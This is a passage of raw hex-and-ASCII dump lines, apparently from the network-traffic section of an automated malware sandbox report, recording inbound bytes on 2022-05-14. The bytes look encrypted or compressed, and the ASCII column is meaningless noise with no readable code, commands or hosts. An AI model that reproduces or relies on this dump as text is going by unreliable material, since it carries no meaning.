ba be f9 81 22 81 72 7e 7b eb 17 ba 65 ef ca 42 bc 36 7c
                                                      Data Ascii: 1+_r]p3|Ea7jyy#]V):oK@waO@<;LF>eWg!Ukl>QOT)A\I;MSMr:g(1L55z"[YzHIrb:oMN5LV#=~m_j04X~,=rA"r~{eB6|
                                                      2022-05-14 13:17:12 UTC468INData Raw: 2a d4 fa ae fc df 56 f3 80 ab 86 8a 2b 2f b6 d2 5c 9c 75 27 65 c1 02 cc 6f 91 f2 72 dd 80 cd e2 cd 76 c9 d8 77 1e dc cd 33 8a 1b 8c cd 16 63 44 de 06 db cf 65 b1 54 14 76 b1 78 30 45 94 69 df 1e 6f d1 33 49 c0 d0 95 65 e1 46 33 40 d1 21 25 dc aa 0e cd 26 3b 4b 05 68 c5 bc 5a 2c 59 2f fd c4 88 3e ce b1 74 56 9b 7d d4 ce a0 9e 57 bb 6e a2 51 c6 81 cc 66 ca cb 73 48 6d b2 7c 75 66 83 06 b1 43 d4 3e 80 d9 e6 d1 00 f9 ae b8 26 d5 19 c3 0e 8f 80 da 2e f6 19 c2 79 8b 4e 50 a4 2b a9 f6 e0 40 39 18 65 1f b7 91 33 d2 3b 0c ca 93 1a de 90 67 fd 37 b1 a7 d3 2a f1 79 1c 02 0d ea 3c 57 1f 03 e6 7a 45 15 fd 23 d2 2c 9e cc 3f 87 e7 7a 15 42 2a 03 80 46 bf 69 df d5 aa ca 48 ba e6 12 a3 b9 88 31 48 a0 86 7d ff 62 eb 14 da 3f 64 b4 53 39 2d 5c 98 c4 33 3e ce 9e 4d b1 57 d5
                                                      Data Ascii: *V+/\u'eorvw3cDeTvx0Eio3IeF3@!%&;KhZ,Y/>tV}WnQfsHm|ufC>&.yNP+@9e3;g7*y<WzE#,?zB*FiH1H}b?dS9-\3>MW
                                                      2022-05-14 13:17:12 UTC472INData Raw: 32 13 12 57 f2 d8 80 75 72 71 66 4f e5 f7 62 57 5a 60 64 52 ba d7 de f3 da 42 7c ae 5b 70 5b 1c a7 6a 7b 04 00 ea e3 c7 bb 2b 3a 94 b1 3a 88 c9 7c 6c 8e 17 b4 d4 34 4c 70 c4 41 ea b4 90 06 78 69 e6 67 bb 2c 0e 68 ec 0a a8 5a 9a 16 53 09 74 8e af f4 1c e9 7e e7 0e ca d2 91 00 35 a7 13 e7 88 f6 00 8b 69 20 22 e1 81 30 b0 0f 19 05 6d 93 01 3e 34 af e4 72 20 cf 30 40 40 00 e4 ed bb ff 44 82 31 7d fd c0 34 c4 1b 10 3b 01 7f 09 2a e5 55 f9 6b 23 5d 65 77 59 e4 0b bf 62 5e 8d b7 19 f5 79 31 f7 13 a3 e9 53 cf c7 55 92 ef c8 5c 29 43 9d d0 80 14 61 06 97 10 bf e8 66 63 02 84 4e 29 cf fc 20 f5 c2 10 a8 22 e3 ed 7a b8 78 8c 87 2d 87 f6 75 01 c3 0a ff d5 08 d5 79 59 11 e4 ed 2f f7 46 49 7f 43 4c 9e 93 1f d7 1b 2d ca 4f d3 87 b1 24 ec eb 13 a1 e1 88 49 36 81 2b 2e ed
                                                      Data Ascii: 2WurqfObWZ`dRB|[p[j{+::|l4LpAxig,hZSt~5i "0m>4r 0@@D1}4;*Uk#]ewYb^y1SU\)CafcN) "zx-uyY/FICL-O$I6+.
                                                      2022-05-14 13:17:12 UTC476INData Raw: 01 07 14 39 e1 74 97 0f 28 85 ae 53 07 dd 45 bf 65 b3 2e 35 8f 1e e0 90 53 8d e5 d9 bf e3 a5 59 de 99 00 9d 26 e8 d6 0c fc 95 df 3d 09 ba 70 8f f2 0a 6b 4e 2b 81 f2 bc b7 0e 71 50 15 35 df fb 52 81 cb d5 a4 a2 8d f7 7b e4 15 d0 17 f6 33 03 95 6c 78 e1 92 cb b7 8f 46 d8 e7 50 5d 8d 13 17 5f d6 d0 17 fb d2 25 b1 55 2a 1c ad a1 b2 11 f2 66 81 bf 43 64 8d 79 88 e1 39 ca 22 e9 28 29 21 ae 92 20 6c 30 a7 af f4 df 71 b2 9e cc 33 20 c7 65 74 d1 3d 41 62 15 8a de 86 48 c6 b3 93 c7 32 50 a2 4f a2 67 96 90 f7 f8 a4 30 1e ed da ee 9c 55 5f df 95 f8 f0 1c 4a cc b4 61 3a c7 7c 84 6b cf 5a 1c a6 7a 2d 9f 01 50 c1 1b 8c 5a d1 fe 36 70 d2 18 be c4 44 f3 81 e0 f2 80 b4 a1 a3 25 fe 6c 50 66 1e 5b 34 17 09 4a 83 62 29 bb a9 a8 77 a5 cd 13 0e 5e 2e ce 86 85 5d 3d 5a 1d 93 03
                                                      Data Ascii: 9t(SEe.5SY&=pkN+qP5R{3lxFP]_%U*fCdy9"()! l0q3 et=AbH2POg0U_Ja:|kZz-PZ6pD%lPf[4Jb)w^.]=Z
                                                      2022-05-14 13:17:12 UTC477INData Raw: 94 1f 3c cf 81 f2 d8 9b 70 3c df f9 21 2f 48 78 29 d1 35 e9 79 25 21 3b de 88 e0 41 d4 a0 7d 26 2c ce 07 25 e7 09 13 0c f7 05 0e a2 d0 e0 f3 01 9b 4d 19 a7 b6 3a dd 02 84 e3 78 56 5f c7 34 f0 55 ec 27 85 32 f4 a1 c2 b7 04 3b e3 47 78 41 1a 56 00 10 59 3a a0 72 11 51 2d 89 56 b6 a0 40 62 c4 14 1f 8a e5 d0 a3 55 2c c6 d6 5c 41 cb 15 3a 88 9e 35 6a 7c 2c 26 5c 00 50 f6 84 4f b9 a4 94 f7 83 d1 43 c1 7d 2f 53 69 8c fe 4a 5a c8 ba d3 c8 b6 6d 0c c6 a4 f0 e0 8c 55 ec f0 ef 17 68 d5 7d 1a f5 a6 cc e4 0f 34 c5 1f 9a f0 2b af 6d f4 32 e3 2d ea 40 58 6f fb 27 b8 c4 fa 40 4b bc 5e d6 dc 58 5e 79 60 9d ac 67 35 10 d3 59 9e ef 8e c6 f9 ff cf f8 be aa 38 99 3d f5 e5 6d 83 32 64 b1 5a d5 ab 87 1f 1a fc 1c e7 96 6c 4e aa 4b a5 f4 82 03 49 b6 0c c9 65 ac 3d be 8a 0c 79 ec
                                                      Data Ascii: <p<!/Hx)5y%!;A}&,%M:xV_4U'2;GxAVY:rQ-V@bU,\A:5j|,&\POC}/SiJZmUh}4+m2-@Xo'@K^X^y`g5Y8=m2dZlNKIe=y
                                                      2022-05-14 13:17:12 UTC481INData Raw: 3d 44 ae b6 03 4f 11 ab 47 d8 8e 4b 93 4a 91 5e fc b1 fb 9b 6d 45 c7 4f 80 32 7e f0 06 ce 5c 9d fd bf e6 39 5d a6 6a 24 63 dc f7 46 a3 88 46 f3 05 ff e9 0b 12 2b ae 2f 7b d0 c5 39 48 00 d9 ae e4 55 03 4a f0 d0 4c 10 77 8e 98 1a c3 8d 7e 5c be 81 51 ef b7 24 4b 47 02 49 a9 f3 c5 ce d8 db 38 d7 ca 02 c8 87 af ca 25 0d 19 ad 89 db b7 0b 59 34 cb c4 6d d8 05 a1 60 20 cd 2b 90 af b6 60 b6 cc bc fa 2a 12 81 44 7b 56 d4 b0 92 5b f9 ae 13 5b f4 4a a6 16 21 1b 42 ff 61 a0 68 79 62 c2 6b 66 38 4e bf ad b8 96 02 14 6b f7 66 df 6f 56 47 61 80 74 d8 34 67 7b 94 41 01 58 8d 67 c6 b6 ba 57 c4 f3 c8 fc 60 94 19 64 a4 eb ee 93 88 95 fd 06 2c 6a 3f 44 0f 40 b1 a4 b9 99 5b 87 c3 e4 1b 63 5d 67 1f d5 cc 62 cd 31 a2 69 86 af 27 f6 07 a4 77 3b bf 84 73 30 4d fc 34 69 f6 cd 9c
                                                      Data Ascii: =DOGKJ^mEO2~\9]j$cFF+/{9HUJLw~\Q$KGI8%Y4m` +`*D{V[[J!Bahybkf8NkfoVGat4g{AXgW`d,j?D@[c]gb1i'w;s0M4i
                                                      2022-05-14 13:17:12 UTC486INData Raw: 90 c7 8f 8d 68 e8 7b e4 e9 45 4c f8 6d a4 aa 0f 49 ee bb 76 81 b0 0f f0 b0 0b 92 6a 1c cd 62 dc 0d 3c 8a ca ae a7 1c 38 e0 96 dd 57 25 6b 57 de 36 63 f2 a5 45 84 ea 1c 64 91 ac 48 3d b4 c1 b7 4f 2f fa 52 00 d7 cf 9c ad c5 07 02 30 5b 78 ee 4d 6a 86 dc 08 d8 28 84 dd 6a e9 38 56 1c a8 61 9b cc b0 03 62 7c 0a 37 49 06 36 2e 64 0e 0b d3 8a 75 e4 6d 3b 7a eb b6 05 77 c7 af 62 78 24 50 2a 2c fe 01 c7 65 f7 71 46 9f 04 1d 4a 4d 95 0e 96 84 c7 1d 9b c3 1b 92 49 04 e9 06 99 7f 3e bc 6b 8a 17 e4 3f 36 74 96 06 34 91 a7 4e 32 88 3b ae e5 c8 97 c1 d9 fd 5e cf cf e1 b5 5d ea c4 83 7b 84 cb 07 dc 6a bc 3c c1 70 63 c5 fb 2b 39 e5 76 74 13 a6 16 b4 34 4b 54 3d 95 58 af 7c ad 6a 0e a7 c2 49 54 5b 8b fe fa 3b 82 1b aa ce 02 b9 db 27 9f 03 e7 83 b3 e7 cf a3 93 52 a2 88 39
                                                      Data Ascii: h{ELmIvjb<8W%kW6cEdH=O/R0[xMj(j8Vab|7I6.dum;zwbx$P*,eqFJMI>k?6t4N2;^]{j<pc+9vt4KT=X|jIT[;'R9
                                                      2022-05-14 13:17:12 UTC490INData Raw: 3a cd 33 3e d6 a2 35 d0 58 98 be 5d b9 f5 de 5d 84 68 32 93 73 35 13 7b 57 f2 e7 d8 5a 50 f8 72 3e 0c ae c8 07 96 f4 0d 34 a2 f9 76 d8 ef c8 bc 20 04 ee 0c 8b c0 99 f6 bf 0e 12 20 4f 2b a2 9b 0b 32 98 af eb d3 c8 00 33 c8 0f e1 3f 5d 83 6f 33 15 27 dd cb 58 ea 7f bc 93 25 a6 69 13 5c 65 e8 97 1a ac e3 e1 1c 63 88 26 ac b8 9f 0a 85 be 9a fb ed 39 3f 58 2c d0 26 86 53 ba 29 1c a6 51 40 99 21 a0 70 ff 9d d6 78 04 37 e9 39 f0 8b 8e 34 6f 16 ad 58 37 a5 e1 44 fb 30 e0 00 eb 05 54 b4 d7 ac 0c ac 40 a9 14 44 c6 2f e8 f2 61 b3 05 af 27 cd 76 2f 2f 9a da c8 04 f6 e2 a9 69 59 96 d1 19 5b 83 c1 1a d0 c9 43 6b 14 79 48 13 e5 04 4b 0d 29 be a4 8c 53 89 13 6e 02 95 c5 1c ad ae c6 7f d6 72 86 1a b5 9f fe 14 0b 43 63 7a f0 c0 14 19 0e 90 15 f4 53 f9 13 97 30 a3 3d d1 23
                                                      Data Ascii: :3>5X]]h2s5{WZPr>4v O+23?]o3'X%i\ec&9?X,&S)Q@!px794oX7D0T@D/a'v//iY[CkyHK)SnrCczS0=#
                                                      2022-05-14 13:17:12 UTC494INData Raw: e1 7b f5 37 89 0a 19 5c 9c 67 ae 39 7f 17 a4 ca 09 16 e6 42 cf 5e 52 3a 52 de 44 eb 88 42 68 c3 32 c1 18 b5 02 ae 87 da 49 78 cb 6d 09 dd d3 d9 1a fb 42 e7 1d d6 9f 16 2f 4c b4 f1 e8 4c 50 71 88 47 ed 41 8e 60 c2 f7 44 66 f3 4f 3e ec 72 e0 c7 02 7d 0c 4b 1e 92 b0 e6 f7 26 6c af b7 f4 61 dd 83 1f 60 34 29 e6 b0 bc 9f 67 40 66 46 a0 2c 63 f9 d0 33 82 2a da 95 77 99 b6 32 3e de 7e f3 e6 87 dc ad 9e 13 89 84 ac 50 be 09 df 9a db b8 ac 9a c3 8e 68 be 5c b4 c7 e9 5e 11 56 15 9c cb 49 60 2b 3c 5b 28 a3 2c ba 44 5b d7 7f 20 fc 70 33 f4 18 66 11 d3 5c cc 86 12 36 34 50 5e 22 c5 73 b7 b3 0f f3 a4 f1 6b d0 39 99 3e 6f 70 c2 2b d0 01 29 c5 de b8 a6 b5 28 a9 07 a1 23 a3 44 4d 11 a2 27 e9 11 6a c3 08 d1 99 c2 1c 58 f3 03 13 d8 ba 5a 35 d2 8b 3e 7a 65 6e 63 63 75 ce a8
                                                      Data Ascii: {7\g9B^R:RDBh2IxmB/LLPqGA`DfO>r}K&la`4)g@fF,c3*w2>~Ph\^VI`+<[(,D[ p3f\64P^"sk9>op+)(#DM'jXZ5>zenccu
                                                      2022-05-14 13:17:12 UTC498INData Raw: b8 68 94 2e 7d f9 aa 58 c5 13 54 8d 20 e1 b8 db ce 14 fd 2e 45 4c b7 24 bd a2 57 bd b6 0c 47 a0 40 d1 7f 2b 45 26 c3 b1 7f d5 dc 7f e1 4b 7b 21 6a 9d 45 a4 65 19 68 38 38 0d 93 24 75 6a 9b b8 24 a9 5d 04 7c f7 05 46 9e 09 03 f1 fa 49 f1 4d fe ca af 3d bb 83 73 ac ba a0 d8 31 4c 67 dc 69 e3 38 6a 6b 4b 1d 01 80 8e f4 7a 70 66 27 32 68 5f 66 61 ed 38 0e 9f 0d df 0f 01 f6 70 4c 1f 4d 26 59 77 96 4d f7 d3 3a f6 c8 65 0a c4 54 0c 8e c6 89 f1 67 e1 c8 03 c4 18 8d ef 6c a3 85 97 14 06 38 be c3 73 20 32 3b 99 b1 00 b0 de 2b 5c 50 dd 0b f5 ed 7c 74 8e 91 6d 56 ba c6 ad e7 5c 7a 3c cd 3b 5a 6f 71 5c c0 d6 b7 ef b1 50 81 00 e6 56 5c b1 7a 2d 67 c4 2f 74 c6 ce ef be 98 d9 f7 4b 5b e9 c8 b8 cf f5 4c cf a6 a2 b7 5b ef 63 60 ea 42 c3 bf f4 3b b5 c5 0e f9 c6 cc d7 82 c0
                                                      Data Ascii: h.}XT .EL$WG@+E&K{!jEeh88$uj$]|FIM=s1Lgi8jkKzpf'2h_fa8pLM&YwM:eTgl8s 2;+\P|tmV\z<;Zoq\PV\z-g/tK[L[c`B;
                                                      2022-05-14 13:17:12 UTC502INData Raw: 1a a3 43 fc 05 cc cb 97 40 ab 55 1d e0 9d 54 19 92 f5 92 d0 c0 c0 18 e2 de b0 7e 6b 86 f3 67 c8 bf cc f0 bf d9 ab 2c c5 ad 6f b5 6f e6 81 75 26 f6 59 32 bf 25 33 f1 87 63 cb 82 03 b1 bf 00 fa 74 ab cc ce 0b f3 2a 26 38 57 d0 98 cf 55 f7 fa c9 21 0f f9 d6 0f aa 84 70 35 cd 88 9d cc ed 82 b3 32 9d b4 d4 7d 4d 2b 8f 69 9f 1b 47 e7 a6 c8 98 58 4a 14 49 15 ba 4b c4 2a 25 b3 25 15 0c f1 47 b7 c0 57 af 66 b6 9d 1c b6 30 14 15 35 34 0c 18 ec e6 b9 d1 2c 8e 30 6f d7 1d 05 d0 2e 59 a2 bd 0e b7 de 44 52 d4 0b 2d 0a 7a 57 29 30 7d 95 86 3c 83 1c bd b3 e3 dc 9a de 28 b0 bf 5d a7 ad 55 6d 3f c4 52 9e 7b 76 22 4b 8f 46 70 7a 28 ac 0e 74 aa eb b9 0c 8a c6 cf 6a 3f a3 a7 d5 b9 28 44 9a c3 d7 05 84 f6 e3 90 f6 b1 5f 1c 6f 7b d9 cb ec b7 42 92 a5 04 3f 3c 8d 8b 4e d5 f7 2b
                                                      Data Ascii: C@UT~kg,oou&Y2%3ct*&8WU!p52}M+iGXJIK*%%GWf054,0o.YDR-zW)0}<(]Um?R{v"KFpz(tj?(D_o{B?<N+
                                                      2022-05-14 13:17:12 UTC506INData Raw: 95 d5 06 24 fa 2a cb 1f 37 c5 a1 cc 9f 1d c4 e6 a8 d3 24 16 76 e0 eb be 14 96 66 86 3d f1 ab 3c fe 05 3a 58 3a 8f b7 07 f4 66 30 9f a9 f5 ac 40 3e 59 b7 e4 97 91 5c 54 b1 cb 33 71 4b d7 a8 49 2d f2 e7 56 a4 94 43 9b 8e 8e e9 61 3c 69 2c e6 a4 81 49 be 76 78 c2 dc fd 4b cb b0 75 24 86 b4 15 5b b8 bd 74 f9 3d 22 94 07 7c ea 47 32 29 9e 64 49 73 bc 5f 94 fb c1 3e 21 e8 e2 a7 f3 d6 95 12 fe bb 05 de 27 2d a8 7f 5c 12 6d d6 dd 19 bd 70 58 9e c0 5f 35 5b 5f 53 8e 04 f1 fc 96 71 e1 67 f9 56 02 9a a9 e9 de ce 13 84 5f 79 c9 13 85 d0 50 09 57 13 6d 1f 71 b3 1b 79 5b 80 a4 9d 7f 81 70 f8 c5 f9 4f 51 66 ea 0d f3 48 99 8e 06 df 2e 07 a5 6e b3 0f eb ef fb 69 53 06 b4 f8 57 3e 55 16 85 54 49 0d 98 0a fc 1e 1a 75 0e ae 18 c4 77 3b 6a c5 92 b2 bb 91 be a5 13 23 47 e2 9a
                                                      Data Ascii: $*7$vf=<:X:f0@>Y\T3qKI-VCa<i,IvxKu$[t="|G2)dIs_>!'-\mpX_5[_SqgV_yPWmqy[pOQfH.niSW>UTIuw;j#G
                                                      2022-05-14 13:17:12 UTC509INData Raw: dd 1f 05 c1 90 2f 3c e7 9d d5 28 d9 f4 c9 26 17 df 6c b7 5a 9f 33 17 9b 9f 30 c2 85 b6 49 8c d2 e8 f3 e5 02 05 87 82 e1 b0 6e b0 08 30 48 b1 b9 a1 06 47 09 b5 09 93 ce 8a a2 63 90 5f 12 7f d3 57 42 6a 06 a8 4c 5b 38 cd ed d5 f9 57 b0 b9 6b 87 4e c2 7a 6f aa fb a0 39 a4 f4 3b 5e fa 80 b7 61 53 2d cd 97 fe c3 d2 ae c7 d8 ff 7c 2c 6a d5 66 a4 1e 21 e0 2a b7 4d 7b 51 5e 81 53 c9 6b 37 6c f6 25 81 e0 b2 32 fb 49 08 84 d5 47 d9 b7 e3 50 4b e9 1e 63 23 dc 27 ea cc 7e a9 d0 74 25 0b b0 69 aa cb 45 5c d4 43 52 53 d6 2a e9 c6 df 2e a8 b7 b2 3a 94 0f f0 5a 46 69 49 6e d2 8b fc bf d7 a2 b7 d5 24 3f 2e 1b 79 e6 32 83 48 52 80 10 1e 53 01 9d 5e 94 99 b1 c2 51 a4 e4 67 26 c9 0c 02 58 43 90 0a 5d fd f8 96 b5 d7 9b 1b 9e b1 21 b3 62 b2 f2 1b 8d 27 47 71 20 c8 27 40 bc 64
                                                      Data Ascii: /<(&lZ30In0HGc_WBjL[8WkNzo9;^aS-|,jf!*M{Q^Sk7l%2IGPKc#'~t%iE\CRS*.:ZFiIn$?.y2HRS^Qg&XC]!b'Gq '@d
                                                      2022-05-14 13:17:12 UTC513INData Raw: 8a bf 97 d1 3a d5 77 af b2 57 5e 2a c4 c4 e2 27 bd ca 00 f6 79 6c 4d 6e 0d 10 77 1c 1c b6 61 2b 0c d3 5f 7b 23 61 94 8d 20 e8 c8 ef 39 75 5f f0 3a dc 5f 8e 09 7a 9a b1 69 a5 15 37 91 f3 0d e4 fb e8 41 8b ec 0e 83 1b e5 3d 8a d6 32 9c b3 12 88 93 dd f2 f4 73 22 5d 1c 90 bc ac 0f bd 0d e0 a4 df 26 36 2d 7f f4 90 5a 6d 7e 6f 0f c5 0b b8 dc 76 0d 07 51 d3 f8 25 29 14 03 ab 19 ba d4 67 51 4f 57 7c a9 6e 41 c5 1f 5b 41 0a 6f 21 a0 0c 18 54 3b c6 29 7d bc ce 06 da 76 a8 c2 36 1a bb 37 bb 65 49 73 9d 2e 10 83 5e c9 3a 2b 8b bf 93 32 97 e3 99 a0 0b 32 4e b8 e7 32 55 37 2b ee 0b c4 0d 9a 30 63 d3 1f 61 ef c5 83 5f 41 35 d1 db 84 ab 55 ca 60 7c 56 b6 6a 26 26 23 ef cf 72 87 b4 37 f1 c9 c6 cc 81 9b b0 a5 af 3d 49 31 e7 30 5f 64 3a 12 82 83 9d 6f af 90 38 dc af 1e 92
                                                      Data Ascii: :wW^*'ylMnwa+_{#a 9u_:_zi7A=2s"]&6-Zm~ovQ%)gQOW|nA[Ao!T;)}v67eIs.^:+22N2U7+0ca_A5U`|Vj&&#r7=I10_d:o8
                                                      2022-05-14 13:17:12 UTC518INData Raw: c8 7a 47 6d ff f7 53 12 2e 46 fd 1f 60 18 d4 38 fb a9 73 36 55 cb f2 29 47 57 87 20 6c 54 4a f6 5d 0e f4 2e bf 8e 17 01 84 2a 9a 5e a8 c8 70 ae be 03 45 cc a9 a6 b5 ad 38 c6 eb e8 74 25 e1 28 5a 00 99 5a e6 8c 2d 31 cf 15 9f 8d 55 34 d4 19 5d 8a cf 5f a2 61 bf c1 71 90 02 6b 1c 95 4f 45 45 d1 3d e0 b2 20 bd f5 e5 c4 6c 52 fd 71 38 0b 4f a8 69 cb 5a 6e 9c a7 e1 b3 17 77 1f 1b df 7c 49 bb f4 6a 73 6c 38 93 9d be ec 7c d5 82 7e 51 49 f4 55 1e d8 15 62 60 72 6d cc 2d 16 be 33 2e e1 71 40 24 b1 1c 70 a4 7a a4 5b fc 0d 0b 2b 81 ba e5 2f 6f b0 ac bf b3 a2 b1 fb 7d 95 be 1c ce ab d5 ad e0 b7 c1 88 f4 f7 17 f8 b4 cb 52 98 6c d0 3d 41 45 47 a6 e9 37 e5 c1 91 f4 bd b8 a6 e2 ff a1 be 74 2a a6 08 b7 3f e9 13 68 f3 2c f8 ac cd 66 af dd e1 ef a3 07 3f ac 0c 4c a5 4e d2
                                                      Data Ascii: zGmS.F`8s6U)GW lTJ].*^pE8t%(ZZ-1U4]_aqkOEE= lRq8OiZnw|Ijsl8|~QIUb`rm-3.q@$pz[+/o}Rl=AEG7t*?h,f?LN
                                                      2022-05-14 13:17:12 UTC522INData Raw: 2f db 45 4c dc 07 81 f8 f3 27 37 ae 5b ee 9b 6e a4 b3 be 21 0f e5 c7 c4 05 8f 1a 43 28 be 03 68 be c5 7d e3 f7 86 48 3b 12 5d dc 71 ac a7 17 5e 22 b3 9e a6 06 92 46 1f 9b 58 ad bb ce ad 24 77 d7 1b 2f 67 08 22 92 cb f2 5b 29 c4 a7 98 d1 ab c5 8b b1 f2 3c 7b fc 3e 51 ed ab ee 72 2b 11 d6 79 aa 61 c1 16 4c bb 6f 34 97 f1 87 6c bd 1a 6e b6 4d e4 8f 75 28 c5 03 83 0b 30 2d 75 88 3c 0e ae 86 52 e2 73 22 80 12 94 83 31 80 1f c2 00 c8 ac 53 c1 6d 57 b3 78 2a 6d 32 b3 6d 71 97 49 4b b5 4a 01 02 02 45 00 b6 3d 5a 97 51 79 f5 48 51 08 ee 27 a6 68 98 92 23 0b ae 83 00 30 62 ba fa 58 90 c2 79 92 e3 d0 4c 04 e8 38 1b 48 df 37 b0 4c 57 77 66 43 ae 4f 0c e6 17 43 ec 62 0d af 31 a2 6a be 4c 0b b2 35 e3 54 1f 68 78 0a d1 78 b3 02 4d d4 86 d6 5f 81 45 ff a2 da 6b 6d d4 e0
                                                      Data Ascii: /EL'7[n!C(h}H;]q^"FX$w/g"[)<{>Qr+yaLo4lnMu(0-u<Rs"1SmWx*m2mqIKJE=ZQyHQ'h#0bXyL8H7LWwfCOCb1jL5ThxxM_Ekm
                                                      2022-05-14 13:17:12 UTC526INData Raw: cb fc 46 25 21 3e b5 81 16 8f 76 f2 e9 65 8e 38 3c 56 d5 80 a1 c0 ac 92 96 a8 77 7f 41 e8 7d f9 f4 c4 7c 68 a1 bb 51 ab 2c cd 62 59 c4 75 31 b7 00 e1 a7 21 f1 ac 3e 7d a0 1d f1 6e 40 0d 78 ec 41 5b 87 78 3e 32 db 91 27 69 43 c1 56 f7 60 4b c5 74 51 42 aa 60 db 43 2e 90 4a e5 75 05 89 fa 08 2f 0e 2b f0 a9 7c 72 3c 6c bc f3 5c db 90 71 cc 01 72 c2 09 0f 83 80 52 10 6b c1 ba c0 6c bf 79 c2 ee 28 19 b6 59 25 59 1b 67 c0 56 61 a4 99 f0 d0 39 dc fa fd 8e 34 e6 be 34 3a 91 cc 5c 98 bb 58 7d c4 a9 22 e7 61 fc cc e8 ef 68 f0 c1 4d c9 23 3b 9e 58 b7 f6 48 af 20 40 f5 2f 37 bd e4 a3 a5 cc 33 a1 b6 e9 60 02 a2 bd 29 a2 4b 77 9b 69 e2 16 2a a1 e0 4d 30 0c 8f 8c 1a 00 9d 7c 88 83 be 87 91 fe 6c cb 90 a9 2b bd 9d 6e 1f ef 72 28 01 43 3d c3 06 76 17 4b cf 85 87 81 e0 b5
                                                      Data Ascii: F%!>ve8<VwA}|hQ,bYu1!>}n@xA[x>2'iCV`KtQB`C.Ju/+|r<l\qrRkly(Y%YgVa944:\X}"ahM#;XH @/73`)Kwi*M0|l+nr(C=vK
                                                      2022-05-14 13:17:12 UTC530INData Raw: f3 56 df 79 1e 68 03 a4 39 0d 9c 46 46 e3 cf 59 e8 e2 b2 e9 fe 2b b7 6e 3e 42 55 4b 19 70 4b 3c 37 c2 52 10 b4 33 e2 e1 12 ce 03 f8 2f cd 61 77 64 93 1b b1 11 d7 83 2e e4 e5 3a 41 61 01 00 ae c2 d3 36 59 5c 66 aa 76 7c 82 cf dd ba dc b0 73 da c8 c0 49 d2 41 d3 46 4b 28 e7 38 39 eb e6 9b 35 99 a0 59 83 02 22 6d 23 0c 02 49 0d 41 ed cd 3c 5a 01 8f 62 98 d6 73 b7 69 db f8 6b 54 2c 04 5d 61 fe bd 44 10 41 2f a8 a0 f9 fc c9 f3 fc eb 6c 8a 2b 4c 35 2d f6 77 7b 28 84 ad ed 2d 46 3b e0 21 bd 48 e0 8b cc 38 ce 60 1e b6 4f 4e 8e db 26 c6 3c 91 d4 0f 99 d5 8a cc c5 84 74 82 99 b6 3a 22 52 72 9b e3 dd 20 eb 62 2c da 62 12 fa 48 d8 58 4f 94 bb 48 93 95 14 c0 4e 75 e5 4b ff a9 93 89 31 98 a8 04 ca 5f eb fd a9 a2 0a bd aa 99 5e ca cb ca 23 0f 33 f9 77 26 d8 5d fb 9b f5
                                                      Data Ascii: Vyh9FFY+n>BUKpK<7R3/awd.:Aa6Y\fv|sIAFK(895Y"m#IA<ZbsikT,]aDA/l+L5-w{(-F;!H8`ON&<t:"Rr b,bHXOHNuK1_^#3w&]
                                                      2022-05-14 13:17:12 UTC534INData Raw: 0f 26 a0 be d6 85 2a 8b ad 7d 59 88 ee fa da a2 ae ac 6f 6c 25 d0 1d f7 de fd dd 41 38 81 b1 96 39 9b af dd 01 51 01 24 63 00 68 eb 84 34 bc 4f f4 70 49 73 21 cd 6c dd 3a f4 fe 44 f4 ba ba 78 b9 8d 78 27 b9 eb d1 29 2e d1 c9 f5 9f c2 d9 2f 42 34 86 34 7e e5 90 2e 05 4a af c5 31 9b af 45 11 fd bd 17 88 e7 13 12 0f c1 50 36 a0 04 56 2f 89 1b 63 32 6d 19 9a ca d2 cb 4f 48 cb a0 39 0e 0f d8 e0 0b ea db 68 4b be 35 14 2b 03 54 4f 27 f2 72 88 92 18 50 40 50 5f e0 db 23 1b 4d 00 fc 29 1a 3a 71 3e 03 d2 1e 34 38 e8 91 83 20 65 11 e1 7c 1f fc c1 84 50 57 ee 0b 0f b4 41 7a fe 77 3a 7b d6 ba 40 f4 36 11 53 c0 ca f5 a5 79 74 81 fb 8b f1 e8 e1 15 89 84 54 cb 48 0c 35 40 27 47 70 59 39 70 32 d5 e3 fd 0a f6 86 8c d4 66 4c bd e7 08 ab 59 a2 2e cf 66 df 8d f2 30 bc 2f 42
                                                      Data Ascii: &*}Yol%A89Q$ch4OpIs!l:Dxx')./B44~.J1EP6V/c2mOH9hK5+TO'rP@P_#M):q>48 e|PWAzw:{@6SytTH5@'GpY9p2fLY.f0/B
                                                      2022-05-14 13:17:12 UTC538INData Raw: e4 5d 6f 14 62 2e 99 cb a2 52 12 f5 1f 63 ad 24 3f 57 82 27 f3 a2 28 01 c8 da 43 a1 8f d9 24 3f fc 0c a1 93 8e ab 51 ca 50 a2 0c 44 eb b1 c5 e1 8b 23 cf 4c 6a 6d c7 25 b6 6e bb 9b 5e 1d be 1b a2 43 cc 0c 8f 6b 86 e0 97 04 7b 53 dd 38 01 c9 18 43 a0 f0 dd 50 51 f9 3e a0 c3 4f 1c 0d 27 53 cf 38 ad eb e3 60 03 a9 56 78 5d 27 1b 40 77 34 9f c4 1d 64 08 11 2d 7b a7 91 53 7b 10 01 19 da 50 87 6b bd e1 db c9 7a f4 de 36 b6 7b e3 2a 2d 0e a7 d9 10 73 22 f9 21 34 e8 56 c2 3f 04 fd 44 56 63 1a 0e ba dd 45 66 59 ce 20 7d 1b 42 aa 7b 21 a7 81 2a a9 39 af c7 60 43 b0 35 23 99 33 e0 b2 45 bb eb 11 40 15 28 7b 8b 3e aa 03 de 9b 35 8b 8c 4c 1b 0b 5f ae 0b 27 61 90 61 0f 61 af 00 de b0 8b f3 2e 0c 40 b7 14 94 34 58 a1 d4 84 90 bc 54 d0 fa 61 03 29 27 03 1a 69 8e 61 4d 30
                                                      Data Ascii: ]ob.Rc$?W'(C$?QPD#Ljm%n^Ck{S8CPQ>O'S8`Vx]'@w4d-{S{Pkz6{*-s"!4V?DVcEfY }B{!*9`C5#3E@({>5L_'aaa.@4XTa)'iaM0
